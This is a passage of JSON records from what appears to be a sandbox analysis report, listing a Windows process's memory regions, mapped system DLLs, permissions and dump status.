1 }, "size": 4096, "start_va": 2147311616, "type": "region", "version": 1 }, "end_va": 2147315711, "entry_point": 0, "filename": null, "id": "region_1355", "name": "private_0x000000007ffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147311616, "timestamp": "00:01:10.312", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001356-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1356", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:10.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1357", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:10.328", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001358-addr_0x0000000000050000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_1358", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:10.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1359", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:10.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001360-addr_0x00000000003a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_233", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_1360", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:01:10.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1361", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:01:10.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1362", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:01:10.330", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968074751, "entry_point": 1967937721, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1363", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:01:10.330", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970151423, "entry_point": 1970082881, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1364", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:01:10.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1365", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:01:10.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1366", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:10.332", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1367", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:01:10.332", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1368", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:10.333", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1369", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:01:10.333", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1370", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:10.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1371", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:01:10.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1372", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:01:10.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1373", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:01:10.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1991495679, "entry_point": 1989810151, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1374", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:10.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1375", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:10.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1376", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:01:10.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1377", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:01:10.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1378", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:10.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1379", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:10.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4685823, "entry_point": 0, "filename": null, "id": "region_1380", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:10.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1381", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:10.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1382", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:01:10.341", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001383-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_234", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1383", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001384-addr_0x0000000000040000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_235", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1384", "name": "private_0x0000000000040000", "norm_filename": null, "region_type": "private_memory", "start_va": 262144, "timestamp": "00:01:10.352", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1863679, "entry_point": 0, "filename": null, "id": "region_1385", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:10.352", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_1386", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:01:10.352", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 5771263, "entry_point": 0, "filename": null, "id": "region_1387", "name": "pagefile_0x0000000000480000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4718592, "timestamp": "00:01:10.352", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 9973759, "entry_point": 0, "filename": null, "id": "region_1388", "name": "pagefile_0x0000000000590000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5832704, "timestamp": "00:01:10.352", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001389-addr_0x0000000000af0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_236", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 11468800, "type": "region", "version": 1 }, "end_va": 11534335, "entry_point": 0, "filename": null, "id": "region_1389", "name": "private_0x0000000000af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11468800, "timestamp": "00:01:10.352", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 25559039, "entry_point": 0, "filename": null, "id": "region_1390", "name": "pagefile_0x0000000000c60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12976128, "timestamp": "00:01:10.352", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_1391", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:01:10.353", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 28504063, "entry_point": 25559040, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1392", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 25559040, "timestamp": "00:01:10.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3088383, "entry_point": 0, "filename": null, "id": "region_1393", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:10.357", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1394", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:01:10.357", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3149823, "entry_point": 3145728, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1395", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:01:10.358", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3219455, "entry_point": 0, "filename": null, "id": "region_1396", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:01:10.359", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001397-addr_0x0000000001b90000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_237", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28901376, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 0, "filename": null, "id": "region_1397", "name": "private_0x0000000001b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 28901376, "timestamp": "00:01:10.363", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001398-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_238", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1398", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:10.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3149823, "entry_point": 0, "filename": null, "id": "region_1399", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:01:10.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3653631, "entry_point": 3421625, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1400", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 3276800, "timestamp": "00:01:10.372", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1402", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:01:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1403", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:01:10.377", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001404-addr_0x0000000000990000-size_0x0000000000160000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1441792, "start_va": 10027008, "type": "region", "version": 1 }, "end_va": 11468799, "entry_point": 0, "filename": null, "id": "region_1404", "name": "private_0x0000000000990000", "norm_filename": null, "region_type": "private_memory", "start_va": 10027008, "timestamp": "00:01:10.379", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 10027008, "type": "region", "version": 1 }, "end_va": 10940415, "entry_point": 0, "filename": null, "id": "region_1405", "name": "pagefile_0x0000000000990000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10027008, "timestamp": "00:01:10.384", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001406-addr_0x0000000000ab0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_240", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 11206656, "type": "region", "version": 1 }, "end_va": 11468799, "entry_point": 0, "filename": null, "id": "region_1406", "name": "private_0x0000000000ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11206656, "timestamp": "00:01:10.385", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001407-addr_0x0000000001d90000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_241", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 32047103, "entry_point": 0, "filename": null, "id": "region_1407", "name": "private_0x0000000001d90000", "norm_filename": null, "region_type": "private_memory", "start_va": 30998528, "timestamp": "00:01:10.385", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001408-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_242", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1408", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:10.385", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001409-addr_0x0000000000320000-size_0x0000000000024000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_243", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3424255, "entry_point": 0, "filename": null, "id": "region_1409", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:01:10.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1935540224, "type": "region", "version": 1 }, "end_va": 1936568319, "entry_point": 1935611873, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_1410", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1935540224, "timestamp": "00:01:10.393", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001411-addr_0x0000000000350000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_244", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3477503, "entry_point": 0, "filename": null, "id": "region_1411", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:01:10.396", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001412-addr_0x0000000000360000-size_0x0000000000009000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_245", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 